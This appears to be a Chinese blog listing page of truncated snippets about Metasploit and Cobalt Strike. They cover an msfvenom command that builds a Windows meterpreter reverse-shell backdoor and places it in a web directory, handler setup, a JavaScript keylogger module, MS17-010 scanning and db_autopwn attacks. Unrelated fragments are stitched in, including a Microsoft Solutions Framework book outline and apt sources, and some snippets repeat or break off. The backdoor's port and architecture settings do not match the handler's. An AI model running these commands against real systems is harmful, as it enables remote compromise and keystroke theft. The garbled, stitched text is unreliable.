生成backdoor msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.187.133 LPORT=6666 -f exe >/var/www/html/chrome/1.exe 设置监听参数 use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST 192.168.187.133 set LPORT 8888 explo…

server/capture/http_javascript_keylogger DEMO使用的官方的效果图: 使用方法: show options 看看 msf auxiliary(server/capture/http_javascript_keylogger) > options Module options (auxiliary/server/capture/http_javascript_keylogger): Name Current Setting Required Descrip…

1.使用网上以上一个监测工具,扫描出存在ms17-010的主机地址 2.在kali中使用MSF进行检测,存在mf17-010漏洞 msf > use auxiliary/scanner/smb/smb_ms17_010 msf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.31.91 RHOSTS => 192.168.31.91 msf auxiliary(scanner/smb/smb_ms17_010) >…

刚刚用Metasploit Pro scan了一下云端服务器.RHOST直接输IP就好. 得到反馈如下: [*] [2019.04.04-14:27:35] Scan initiated: Speed: 5, Max: 300m (Portscanning) (UDP probes) (Finger enumeration) (H.323 probes) [+] [2019.04.04-14:27:35] Workspace:default Progress:1/177 (0%) Sweepin…

目录 第一部分 解决方案交付基础 第1章 什么是MSF,它适合你吗 2 1.1 MSF的历史和起源 2 1.2 为什么是“框架” 3 1.3 MSF有何不同 5 1.4 MSF第四版的要素 5 1.5 小结 6 第2章 了解解决方案的交付环境 7 2.1 评估环境带来的挑战 7 2.1.1 商业环境 8 2.1.2 企业文化 8 2.1.3 内部管理:来自程序与工作流程的挑战 9 2.1.4 来自人的挑战 9 2.1.5 来自技术的挑战 10 2.2 优化约束条件 10 2.2.1 成本 11…

一.msfconsole ?   帮助菜单 back 从当前环境返回 banner   显示一个MSF banner cd   切换目录 color   颜色转换 connect   连接一个主机 exit   退出MSF help   帮助菜单 info   显示一个或多个模块的信息 irb   进入irb脚本模式 jobs   显示和管理作业 kill   杀死一个作业 load   加载一个插件 loadpath 在一个路径搜索并加载模块 quit   退出MSF resource 运行存…

一.msfconsole ?   帮助菜单 back 从当前环境返回 banner   显示一个MSF banner cd   切换目录 color   颜色转换 connect   连接一个主机 exit   退出MSF help   帮助菜单 info   显示一个或多个模块的信息 irb   进入irb脚本模式 jobs   显示和管理作业 kill   杀死一个作业 load   加载一个插件 loadpath 在一个路径搜索并加载模块 quit   退出MSF resource 运行存…

msf的强大之处也就不做探讨了,虽然这些东西网上很多.但我想说说我的感受. 这次的演示是在BT5中远程攻击一台win2003 sp2 metasploit是4.3的 需要说明的一点是 现在的BT5中不像BT4中有postgresql数据库 需要使用的须自行安装. 并且现在msf在4.0以后就没有了db_autopwn. 首先在BT5中打开msf. 创建数据库 ,加载db_autopwn 使用db_nmap进行扫描 使用db_autopwn 进行自动化攻击 然后就等一会就可以了,电脑内存有点小.吃…

一.服务器搭建与连接(1)团队服务器上: sudo ./teamserver 服务器IP 连接密码 (VPS的话要写外网ip,并且可以进行端口映射,默认使用50050端口) 但是这个一关闭团队服务器也就关闭了,这里我们可以把他置于后台来运行: nohup ./teamserver IP 用户名 & 这样就可以了,这个目录下会生成一个nohup.out的文件内存使用超过%50 无法启动java虚拟机.在结束Cobalt Strike的时候也要同时结束所有 msfrpcd 进程,不要下次启动会启动不…

配置vps的时候,随手记录一下~~ 添加一些源: vi /etc/apt/sources.list deb http://mirrors.aliyun.com/ubuntu/ xenial main restricted universe multiverse deb http://mirrors.aliyun.com/ubuntu/ xenial-security main restricted universe multiverse deb http://mirrors.aliyun.com…